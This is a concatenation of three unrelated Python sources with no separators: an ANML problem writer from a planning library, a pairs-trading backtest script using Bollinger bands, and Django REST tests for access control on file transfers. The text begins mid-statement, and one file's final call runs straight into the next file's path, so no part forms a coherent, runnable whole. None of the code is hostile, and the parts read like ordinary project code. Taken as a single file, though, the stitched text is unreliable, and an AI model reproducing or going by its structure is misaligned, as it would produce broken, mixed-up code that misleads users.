'end', 'false', 'infinity', 'object', 'start', 'true', 'boolean', 'float', 'rational', 'integer', 'string', 'type', 'set', 'subset', 'powerset', 'intersect', 'union', 'elt'} # The following map is used to mangle the invalid names by their class. 
INITIAL_LETTER: Dict[type, str] = {InstantaneousAction: 'a', DurativeAction: 'a', Fluent: 'f', Parameter: 'p', Object: 'o'} class ConverterToANMLString(walkers.DagWalker): '''Expression converter to an ANML string.''' def __init__(self, names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str], env: 'up.environment.Environment'): walkers.DagWalker.__init__(self) self._names_mapping = names_mapping self.simplifier = walkers.Simplifier(env) def convert(self, expression): '''Converts the given expression to a ANML string.''' return self.walk(self.simplifier.simplify(expression)) #NOTE maybe the converter could remove the first and last char, if they are '(' and ')' def walk_exists(self, expression, args): assert len(args) == 1 vars_string_gen = (f'{_get_anml_name(v.type, self._names_mapping)} {_get_anml_name(v, self._names_mapping)}' for v in expression.variables()) return f'(exists({", ".join(vars_string_gen)}) {{ {args[0]} }})' def walk_forall(self, expression, args): assert len(args) == 1 vars_string_gen = (f'{_get_anml_name(v.type, self._names_mapping)} {_get_anml_name(v, self._names_mapping)}' for v in expression.variables()) return f'(forall({", ".join(vars_string_gen)}) {{ {args[0]} }})' def walk_variable_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.variable(), self._names_mapping) def walk_and(self, expression, args): assert len(args) > 1 return f'({" and ".join(args)})' def walk_or(self, expression, args): assert len(args) > 1 return f'({" or ".join(args)})' def walk_not(self, expression, args): assert len(args) == 1 return f'(not {args[0]})' def walk_implies(self, expression, args): assert len(args) == 2 return f'({args[0]} implies {args[1]})' def walk_iff(self, expression, args): assert len(args) == 2 return f'({args[0]} iff {args[1]})' def walk_fluent_exp(self, expression, args): if len(args) == 0: return self._names_mapping[expression.fluent()] else: return f'{self._names_mapping[expression.fluent()]}({", ".join(args)})' def walk_param_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.parameter(), self._names_mapping) def walk_object_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.object(), self._names_mapping) def walk_bool_constant(self, expression, args): assert len(args) == 0 if expression.bool_constant_value(): return 'true' return 'false' def walk_real_constant(self, expression, args): assert len(args) == 0 frac = cast(Fraction, expression.constant_value()) return f'({frac.numerator}/{frac.denominator})' def walk_int_constant(self, expression, args): assert len(args) == 0 return str(expression.constant_value()) def walk_plus(self, expression, args): assert len(args) > 1 return f"({' + '.join(args)})" def walk_minus(self, expression, args): assert len(args) == 2 return f'({args[0]} - {args[1]})' def walk_times(self, expression, args): assert len(args) > 1 return f"({' * '.join(args)})" def walk_div(self, expression, args): assert len(args) == 2 return f'({args[0]} / {args[1]})' def walk_le(self, expression, args): assert len(args) == 2 return f'({args[0]} <= {args[1]})' def walk_lt(self, expression, args): assert len(args) == 2 return f'({args[0]} < {args[1]})' def walk_equals(self, expression, args): assert len(args) == 2 return f'({args[0]} == {args[1]})' class ANMLWriter: '''This class can be used to write a Problem in ANML.''' def __init__(self, problem: 'up.model.Problem'): self.problem = 
problem def _write_problem(self, out: IO[str]): names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str] = {} # Init names_mapping. names_mapping[self.problem.env.type_manager.BoolType()] = 'boolean' names_mapping[self.problem.env.type_manager.IntType()] = 'integer' names_mapping[self.problem.env.type_manager.RealType()] = 'float' for t in self.problem.user_types: ut = cast(_UserType, t) if _is_valid_anml_name(ut.name): # No renaming needed names_mapping[t] = ut.name for a in self.problem.actions: if _is_valid_anml_name(a.name): # No renaming needed names_mapping[a] = a.name for f in self.problem.fluents: if _is_valid_anml_name(f.name): # No renaming needed names_mapping[f] = f.name for o in self.problem.all_objects: if _is_valid_anml_name(o.name): # No renaming needed names_mapping[o] = o.name for t in self.problem.user_types: anml_type_name = _get_anml_name(t, names_mapping) out.write(f'type {anml_type_name}') if cast(_UserType, t).father is None: out.write(';\n') else: # For construction in the Problem, the father of a UserType is always added before the UserType itself. father = cast(_UserType, t).father assert father is not None assert names_mapping[father] is not None out.write(f' < {names_mapping[father]};\n') static_fluents = self.problem.get_static_fluents() for f in self.problem.fluents: parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in f.signature] params_written = f'({", ".join(parameters)})' if len(parameters) > 0 else '' if f in static_fluents: out.write(f'constant {_get_anml_name(f.type, names_mapping)} {_get_anml_name(f, names_mapping)}{params_written};\n') else: out.write(f'fluent {_get_anml_name(f.type, names_mapping)} {_get_anml_name(f, names_mapping)}{params_written};\n') converter = ConverterToANMLString(names_mapping, self.problem.env) for a in self.problem.actions: if isinstance(a, up.model.InstantaneousAction): parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in a.parameters] out.write(f'action {_get_anml_name(a, names_mapping)}({", ".join(parameters)}) {{\n') for p in a.preconditions: out.write(f' [ start ] {converter.convert(p)};\n') for e in a.effects: out.write(f' {self._convert_effect(e, converter, None, 3)}') out.write('};\n') elif isinstance(a, DurativeAction): parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in a.parameters] out.write(f'action {_get_anml_name(a, names_mapping)}({", ".join(parameters)}) {{\n') left_bound = ' > ' if a.duration.is_left_open() else ' >= ' right_bound = ' < ' if a.duration.is_right_open() else ' <= ' out.write(f' duration{left_bound}{converter.convert(a.duration.lower)} and ') out.write(f'duration{right_bound}{converter.convert(a.duration.upper)};\n') for i, cl in a.conditions.items(): for c in cl: out.write(f' {self._convert_anml_interval(i)} {converter.convert(c)};\n') for ti, el in a.effects.items(): for e in el: out.write(f' {self._convert_effect(e, converter, ti, 3)}') out.write('};\n') else: raise NotImplementedError for t in self.problem.user_types: # Define objects obj_names = [_get_anml_name(o, names_mapping) for o in self.problem.objects(t) if o.type == t] if len(obj_names) > 0: out.write(f'instance {_get_anml_name(t, names_mapping)} {", ".join(obj_names)};\n') for fe, v in self.problem.initial_values.items(): assert fe.is_fluent_exp() if fe.fluent() in static_fluents: 
out.write(f'{converter.convert(fe)} := {converter.convert(v)};\n') else: out.write(f'[ start ] {converter.convert(fe)} := {converter.convert(v)};\n') for ti, el in self.problem.timed_effects.items(): for e in el: out.write(self._convert_effect(e, converter, ti)) for g in self.problem.goals: out.write(f'[ end ] {converter.convert(g)};\n') for i, gl in self.problem.timed_goals.items(): for g in gl: out.write(f'{self._convert_anml_interval(i)} {converter.convert(g)};\n') def print_problem(self): '''Prints to std output the ANML problem.''' self._write_problem(sys.stdout) def get_problem(self) -> str: '''Returns the ANML problem.''' out = StringIO() self._write_problem(out) return out.getvalue() def write_problem(self, filename: str): '''Dumps to file the ANML problem.''' with open(filename, 'w') as f: self._write_problem(f) def _convert_effect(self, effect: 'up.model.Effect', converter: ConverterToANMLString, timing: 'up.model.Timing' = None, spaces_from_left: int = 0) -> str: results: List[str] = [] anml_timing = self._convert_anml_timing(timing) if timing is not None else 'start' if effect.is_conditional(): results.append(f'when [ {anml_timing} ] {converter.convert(effect.condition)}\n{spaces_from_left*" "}{{') results.append(f'[ {anml_timing} ] ') results.append(converter.convert(effect.fluent)) if effect.is_assignment(): results.append(' := ') elif effect.is_increase(): results.append(f' :increase ') elif effect.is_decrease(): results.append(f' :decrease ') else: raise NotImplementedError results.append(f'{converter.convert(effect.value)};\n') if effect.is_conditional(): results.append(f'{spaces_from_left*" "}}}\n') return ''.join(results) def _convert_anml_timing(self, timing: 'up.model.Timing') -> str: time = 'start' if timing.is_from_start() else 'end' if timing.delay > 0: return f'{time} + {str(timing.delay)}' elif timing.delay == 0: return time else: #timing.delay < 0 return f'{time} - {str(timing.delay * (-1))}' def _convert_anml_interval(self, interval: 'up.model.TimeInterval') -> str: left_bracket = '(' if interval.is_left_open() else '[' right_bracket = ')' if interval.is_left_open() else ']' return f'{left_bracket} {self._convert_anml_timing(interval.lower)}, {self._convert_anml_timing(interval.upper)} {right_bracket}' def _is_valid_anml_name(name: str) -> bool: regex = re.compile(r'^[a-zA-Z][a-zA-Z0-9_]*') if re.match(regex, name) is None or name in ANML_KEYWORDS: # If the name does not start with an alphabetic char or is a keyword return False return True def _get_anml_valid_name(item: Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object']) -> str: '''This function returns a valid ANML name.''' if isinstance(item, up.model.Type): assert item.is_user_type() name = cast(_UserType, item).name else: name = item.name regex = re.compile(r'^[a-zA-Z]+.*') if re.match(regex, name) is None: # If the name does not start with an alphabetic char, we make it start with one. name = f'{INITIAL_LETTER.get(type(item), "x")}_{name}' name = re.sub('[^0-9a-zA-Z_]', '_', name) #Substitute non-valid elements with "_" while name in ANML_KEYWORDS: # If the name is in the keywords, apply an underscore at the end until it is not a keyword anymore. 
name = f'{name}_' return name def _get_anml_name(item: Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str]) -> str: '''Important note: This method updates the names_mapping ''' new_name: Optional[str] = names_mapping.get(item, None) if new_name is None: # The type is not in the dictionary, so his name must be added if isinstance(item, up.model.Type) and item.is_int_type(): num_type = cast(_IntType, item) left_bound = '(-infinity' if num_type.lower_bound is None else f'[{str(num_type.lower_bound)}' right_bound = 'infinity)' if num_type.upper_bound is None else f'{str(num_type.upper_bound)}]' new_name = f'integer {left_bound}, {right_bound}' elif isinstance(item, up.model.Type) and item.is_real_type(): num_real_type = cast(_RealType, item) if num_real_type.lower_bound is None: left_bound = '(-infinity' elif num_real_type.lower_bound.denominator == 1: left_bound = f'[{str(num_real_type.lower_bound)}.0' else: left_bound = f'[{str(num_real_type.lower_bound)}' if num_real_type.upper_bound is None: right_bound = 'infinity)' elif num_real_type.upper_bound.denominator == 1: right_bound = f'{str(num_real_type.upper_bound)}.0]' else: right_bound = f'{str(num_real_type.upper_bound)}]' new_name = f'float {left_bound}, {right_bound}' else: # We mangle the name and get a fresh one new_name = _get_anml_valid_name(item) test_name = new_name # Init values count = 0 while test_name in names_mapping.values(): # Loop until we find a fresh name test_name = f'{new_name}_{str(count)}' count += 1 new_name = test_name assert _is_valid_anml_name(new_name) names_mapping[item] = new_name # Once a fresh valid name is found, update the map. 
return cast(str, new_name) import pandas as pd import statsmodels.tsa.stattools as ts import seaborn import numpy as np import cointegration import statistics # to do # 5 day moving average, more than 1 pair, 100,000 import matplotlib.pyplot as plt def mean(lst): return sum(lst) / len(lst) def stan_dev(lst): return statistics.pstdev(lst) def z_score(val1, val2, lst): ratio = val1 / val2 return (ratio - mean(lst)) / (stan_dev(lst)) def get_moving_average(ratio_lst, window_size): ratio = pd.DataFrame(ratio_lst) moving_average = ratio.rolling(window=window_size).mean() moving_average_lst = moving_average.values.tolist() return moving_average, moving_average_lst def bollinger_bands(ratio_lst, window_size, num_sd=1.4): ratio = pd.DataFrame(ratio_lst) moving_average, moving_average_lst = get_moving_average(ratio_lst, window_size) moving_sd = ratio.rolling(window=window_size).std() moving_sd_lst = moving_sd.values.tolist() upper_band = (moving_average + (moving_sd * num_sd)).values.tolist() lower_band = (moving_average - (moving_sd * num_sd)).values.tolist() return moving_average_lst, moving_sd_lst, upper_band, lower_band def moving_z_score(moving_average_short_lst, moving_average_lst, moving_sd_lst, index): return (moving_average_short_lst[index][0] - moving_average_lst[index][0]) / (moving_sd_lst[index][0]) def trade_moving(ratio, stock1, stock2, index, window_size=20, short_window_size=5): case = 0 multiplier = 1 moving_average, moving_sd, upper_band, lower_band = bollinger_bands(ratio, window_size) moving_average_short, moving_average_short_lst = get_moving_average(ratio, short_window_size) if (moving_average_short_lst[index][0] < lower_band[index][0]): case = 2 multiplier = -1 * moving_z_score(moving_average_short_lst, moving_average, moving_sd, index) elif (moving_average_short_lst[index][0] > upper_band[index][0]): case = 1 multiplier = moving_z_score(moving_average_short_lst, moving_average, moving_sd, index) return case, multiplier def trade_simple(ratio, stock1, stock2, index): cur_score = z_score(stock1[index], stock2[index], ratio) case = 0 if (cur_score > 1): case = 1 if (cur_score < -1): case = 2 cur_score = max(cur_score, -1 * cur_score) return case, cur_score def testing(start,ratio, stock1, stock2, model, starting_amount, const): # const should be >5 portfolio_value = starting_amount stock1_owned = 0 stock2_owned = 0 case = 0 cur_score = 0 buy_time = [] buy_price = [] sell_time = [] sell_price = [] for i in range(start, len(ratio)): print(portfolio_value) if (model == 1): # simple case, cur_score = trade_simple(ratio, stock1, stock2, i) else: case, cur_score = trade_moving(ratio, stock1, stock2, i) if (case == 1): sell_time.append(i) sell_price.append(stock1[i]) amount_sold = min(stock1_owned, (portfolio_value * cur_score)/(stock1[i] * const)) stock1_owned -= amount_sold portfolio_value += amount_sold * stock1[i] buy_time.append(i) buy_price.append(stock2[i]) amount_bought = min((portfolio_value * cur_score)/(stock2[i] * const), portfolio_value/stock2[i]) stock2_owned += amount_bought portfolio_value -= amount_bought * stock2[i] elif (case == 2): sell_time.append(i) sell_price.append(stock2[i]) amount_sold = min(stock2_owned, (portfolio_value * cur_score)/(stock2[i] * const)) stock2_owned -= amount_sold portfolio_value += amount_sold * stock2[i] buy_time.append(i) buy_price.append(stock1[i]) amount_bought = min((portfolio_value * cur_score)/(stock1[i] * const), portfolio_value/stock1[i]) stock1_owned += amount_bought portfolio_value -= amount_bought * stock1[i] portfolio_value += 
stock1_owned * stock1[len(ratio) - 1] + stock2_owned * stock2[len(ratio) - 1] print(portfolio_value) print(stock1_owned) print(stock2_owned) plt.plot(stock1) plt.plot(stock2) plt.scatter(buy_time,buy_price, marker= 6,color ='green') plt.scatter(sell_time, sell_price, marker =7, color = 'red') plt.show() if (model == 2): moving_average_lst, moving_sd_lst, upper_band, lower_band = bollinger_bands(ratio,20) plt.plot(upper_band) plt.plot(lower_band) plt.plot(ratio) plt.show() def main(): start_pointer = 2 end_pointer = 1393 stock_series = cointegration.get_data(start_pointer, end_pointer) tickers, pairs, p_values, coint_sec = cointegration.perform_coint(start_pointer, end_pointer) stock1 = stock_series[pairs[1][0]].tolist() stock2 = stock_series[pairs[1][1]].tolist() ratio = np.divide(stock_series[pairs[1][0]].tolist(), stock_series[pairs[1][1]].tolist()) # testing_moving(ratio, stock1, stock2, 1) testing(639, ratio, stock1, stock2, 2, 100000, 10) main()transfer_app/tests.py import sys from Crypto.Cipher import DES import base64 from django.test import TestCase import unittest.mock as mock from rest_framework.test import APIClient from rest_framework import status from django.urls import reverse from django.contrib.auth import get_user_model from django.conf import settings from django.core.exceptions import ObjectDoesNotExist from base.models import Resource from transfer_app.models import Transfer, TransferCoordinator, FailedTransfer # a method for creating a reasonable test dataset: def create_data(testcase_obj): # create two users-- one is admin, other is regular testcase_obj.regular_user = get_user_model().objects.create_user(email=settings.REGULAR_TEST_EMAIL, password='!') testcase_obj.admin_user = get_user_model().objects.create_user(email=settings.ADMIN_TEST_EMAIL, password='!', is_staff=True) testcase_obj.other_user = get_user_model().objects.create_user(email=settings.OTHER_TEST_EMAIL, password='!') # create a couple of Resources owned by admin: r1 = Resource.objects.create( source = 'google_bucket', path='gs://a/b/admin_owned1.txt', size=500, owner=testcase_obj.admin_user, ) r2 = Resource.objects.create( source='google_storage', path='in some user dropbox1', size=500, owner=testcase_obj.admin_user, ) # create a couple of resources owned by the regular user: r3 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned1.txt', size=500, owner=testcase_obj.regular_user, ) r4 = Resource.objects.create( source='google_storage', path='gs://a/b/reg_owned2.txt', size=500, owner=testcase_obj.regular_user, ) r5 = Resource.objects.create( source='google_storage', path='in some user dropbox2', size=500, owner=testcase_obj.regular_user, ) # create a batch of Transfers: tc1 = TransferCoordinator.objects.create() tc2 = TransferCoordinator.objects.create() tc3 = TransferCoordinator.objects.create() tc4 = TransferCoordinator.objects.create() # create Transfer instances for the Resources above # An admin-owned download transfer t1 = Transfer.objects.create( download=True, resource = r1, destination = 'dropbox', coordinator = tc1, originator = testcase_obj.admin_user ) # Create two downloads and one upload owned by a regular user: t2 = Transfer.objects.create( download=True, resource = r3, destination = 'dropbox', coordinator = tc2, originator = testcase_obj.regular_user ) t3 = Transfer.objects.create( download=True, resource = r4, destination = 'dropbox', coordinator = tc2, originator = testcase_obj.regular_user ) t4 = Transfer.objects.create( download=False, resource = r5, 
destination = 'our system', coordinator = tc3, originator = testcase_obj.regular_user ) # now create a Transfer that was originated by an admin, but the Resource is owned by # a regular user t5 = Transfer.objects.create( download=False, resource = r5, destination = 'our system', coordinator = tc4, originator = testcase_obj.admin_user ) ''' Tests for listing Transfers: - lists all Transfers if requested by admin - If non-admin request, lists only those owned by that user ''' class TransferListTestCase(TestCase): def setUp(self): create_data(self) def test_list_all_transfers_for_admin(self): ''' This tests that the admin can list all existing Transfers ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 5) def test_nonadmin_list_returns_only_owned_transfers(self): ''' This tests that a regular user can only list the Transfer objects they originated. Note that this does NOT list the Transfers that happened for Resources they owned. ''' reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) user_transfers = Transfer.objects.user_transfers(reg_user) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 3) def test_list_download_transfers_for_admin(self): ''' This tests that the admin can list all the downloads, regardless of user ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=true' % url response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 3) def test_list_upload_transfers_for_admin(self): ''' This tests that the admin can list all the uploads, regardless of user ''' t = Transfer.objects.all() admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=false' % url response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) def test_list_download_transfers_for_reguser(self): ''' This tests that the regular user can list all their downloads ''' t = Transfer.objects.all() reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=true' % url response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) def test_list_upload_transfers_for_reguser(self): ''' This tests that the regular user can list all their uploads Note that there were multiple uploads of this user's files. 
However, only one of those was originated by this regular user; the other was transferred by an admin ''' t = Transfer.objects.all() reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-list') url = '%s?download=false' % url response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 1) ''' Test for retrieving a specific Transfer: - returns 404 if the pk does not exist regardless of user - returns 404 if a non-admin user requests a Transfer owned by someone else - returns correctly if admin requests Transfer owned by someone else - returns correctly if admin requests Transfer owned by themself ''' class TransferDetailTestCase(TestCase): def setUp(self): create_data(self) def test_return_404_for_missing_transfer(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[666,]) # some non-existant pk response = admin_client.get(url) self.assertEqual(response.status_code,404) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[666,]) # some non-existant pk response = reg_client.get(url) self.assertEqual(response.status_code,404) def test_admin_user_can_query_own_transfer(self): admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = Transfer.objects.user_transfers(admin_user) instance = t[0] admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the admin: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, admin_user) def test_admin_user_can_query_others_transfer(self): # get an instance of a regular user's Transfer reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = Transfer.objects.user_transfers(reg_user) instance = t[0] # create admin client: admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the other/regular user: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, reg_user) def test_regular_user_can_query_own_transfer(self): # get an instance of a regular user's Transfer reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = Transfer.objects.user_transfers(reg_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the Transfer is in fact # owned by the other/regular user: data = response.data resource_pk = data['resource'] r = Resource.objects.get(pk=resource_pk) owner = r.get_owner() self.assertEqual(owner, reg_user) def test_regular_user_cannot_query_others_transfer(self): # get an instance of another user's Transfer (here, the admins) admin_user 
= get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = Transfer.objects.user_transfers(admin_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('transfer-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 404) ''' Tests for UserTransferList: - non-admin receives 403 - using a pk (of a user) that does not exist returns a 404 - properly returns a list of Transfers for a particular owner ''' class UserTransferListTestCase(TestCase): def setUp(self): create_data(self) def test_404_from_nonexistent_user_for_user_transfer_list(self): # query all existing users, get the max pk, then add 1 # to guarantee a non-existent user's pk all_users = get_user_model().objects.all() all_user_pks = [x.pk for x in all_users] max_pk = max(all_user_pks) nonexistent_user_pk = max_pk + 1 admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('user-transfer-list', args=[nonexistent_user_pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 404) def test_non_admin_user_gets_403_for_user_specific_transfer_list(self): ''' regular users cannot access the /resources/user// endpoint which lists the resources belonging to a specific user. That functionality is already handled by a request to the /resources/ endpoint ''' client = APIClient() client.login(email=settings.REGULAR_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-transfer-list', args=[reguser_pk]) response = client.get(url) self.assertEqual(response.status_code,403) def test_admin_user_correctly_can_get_user_specific_transfer_list(self): # establish the admin client: client = APIClient() client.login(email=settings.ADMIN_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-transfer-list', args=[reguser_pk]) response = client.get(url) data = response.data self.assertEqual(response.status_code,200) self.assertEqual(len(response.data), 3) owner_status = [] for item in data: resource_pk = item['resource'] resource_obj = Resource.objects.get(pk=resource_pk) owner_status.append(resource_obj.owner == u) self.assertTrue(all(owner_status)) ''' Tests for batch list (TransferCoordinator): - lists all TransferCoordinators if requested by admin - If non-admin request, lists only TransferCoordinator objects owned by that user ''' class TransferCoordinatorListTestCase(TestCase): def setUp(self): create_data(self) def test_list_all_transfercoordinators_for_admin(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-list') response = admin_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 4) def test_nonadmin_list_returns_only_owned_transfers(self): reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) user_tc = TransferCoordinator.objects.user_transfer_coordinators(reg_user) user_tc_pk = set([x.pk for x in user_tc]) # the primary keys of the reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-list') response = reg_client.get(url) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) data = 
response.data result_set = set() for item in data: result_set.add(item['id']) self.assertTrue(user_tc_pk == result_set) def test_unauthenticated_user_gets_403_for_transfercoordinator_list(self): client = APIClient() url = reverse('batch-list') response = client.get(url) self.assertEqual(response.status_code, 403) ''' Tests for batch detail (TransferCoordinator): - returns 404 if the pk does not exist regardless of requesting user - returns 404 if a non-admin user requests a TransferCoordinator owned by someone else - returns correctly if admin requests TransferCoordinator owned by someone else - returns correctly if admin requests TransferCoordinator owned by themself ''' class TransferCoordinatorDetailTestCase(TestCase): def setUp(self): create_data(self) def test_return_404_for_missing_tc(self): admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[666,]) # some non-existant pk response = admin_client.get(url) self.assertEqual(response.status_code,404) reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[666,]) # some non-existant pk response = reg_client.get(url) self.assertEqual(response.status_code,404) def test_admin_user_can_query_own_tc(self): admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(admin_user) instance = t[0] admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the Resource 'wrapped' by the TransferCoordinator is in fact # owned by the admin: data = response.data tc_pk = data['id'] transfers = Transfer.objects.filter(coordinator__pk = tc_pk) owners = list(set([t.resource.owner for t in transfers])) self.assertTrue(len(owners) == 1) self.assertTrue(owners[0] == admin_user) def test_admin_user_can_query_others_tc(self): # get an instance of a regular user's TransferCoordinator reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(reg_user) instance = t[0] # create admin client: admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 200) # check that the TransferCoordinator is in fact # owned by the regular user: data = response.data tc_pk = data['id'] tc = TransferCoordinator.objects.get(pk=tc_pk) transfers_for_this_tc = Transfer.objects.filter(coordinator=tc) owners = list(set([x.resource.owner for x in transfers_for_this_tc])) self.assertEqual(len(owners), 1) self.assertEqual(owners[0], reg_user) def test_regular_user_can_query_own_tc(self): # get an instance of a regular user's TransferCoordinator reg_user = get_user_model().objects.get(email=settings.REGULAR_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(reg_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 200) # check that the TransferCoordinator is in fact # owned by the other/regular user: data = response.data tc_pk = data['id'] transfers = 
Transfer.objects.filter(coordinator__pk = tc_pk) owners = list(set([t.resource.owner for t in transfers])) self.assertTrue(len(owners) == 1) self.assertTrue(owners[0] == reg_user) def test_regular_user_cannot_query_others_tc(self): # get an instance of another user's TransferCoordinator (here, the admins) admin_user = get_user_model().objects.get(email=settings.ADMIN_TEST_EMAIL) t = TransferCoordinator.objects.user_transfer_coordinators(admin_user) instance = t[0] # create regular client: reg_client = APIClient() reg_client.login(email=settings.REGULAR_TEST_EMAIL, password='!') url = reverse('batch-detail', args=[instance.pk,]) response = reg_client.get(url) self.assertEqual(response.status_code, 404) ''' Tests for UserBatchList (TransferCoordinator): - non-admin receives 403 - using a pk that does not exist returns a 404 - properly returns a list of TransferCoordinators for a particular owner ''' class TransferCoordinatorUserListCase(TestCase): def setUp(self): create_data(self) def test_404_from_nonexistent_user_for_user_tc_list(self): # query all existing users, get the max pk, then add 1 # to guarantee a non-existent user's pk all_users = get_user_model().objects.all() all_user_pks = [x.pk for x in all_users] max_pk = max(all_user_pks) nonexistent_user_pk = max_pk + 1 admin_client = APIClient() admin_client.login(email=settings.ADMIN_TEST_EMAIL, password='!') url = reverse('user-batch-list', args=[nonexistent_user_pk,]) response = admin_client.get(url) self.assertEqual(response.status_code, 404) def test_non_admin_user_gets_403_for_user_specific_tc_list(self): ''' regular users cannot access the /resources/user// endpoint which lists the resources belonging to a specific user. That functionality is already handled by a request to the /resources/ endpoint ''' client = APIClient() client.login(email=settings.REGULAR_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-batch-list', args=[reguser_pk]) response = client.get(url) self.assertEqual(response.status_code,403) def test_admin_user_correctly_can_get_user_specific_tc_list(self): # establish the admin client: client = APIClient() client.login(email=settings.ADMIN_TEST_EMAIL, password='!') # get the regular user's pk: u = get_user_model().objects.filter(email=settings.REGULAR_TEST_EMAIL)[0] reguser_pk = u.pk url = reverse('user-batch-list', args=[reguser_pk]) response = client.get(url) data = response.data self.assertEqual(response.status_code, 200) self.assertEqual(len(response.data), 2) # check that the TransferCoordinators returned are all properly owned by reg_user owner_list = [] for item in data: tc_pk = item['id'] transfers = Transfer.objects.filter(coordinator__pk = tc_pk) owners = [t.resource.owner for t in transfers] owner_list.extend(owners) owner_list = list(set(owner_list)) self.assertTrue(len(owner_list) == 1) self.assertTrue(owner_list[0] == u) ''' 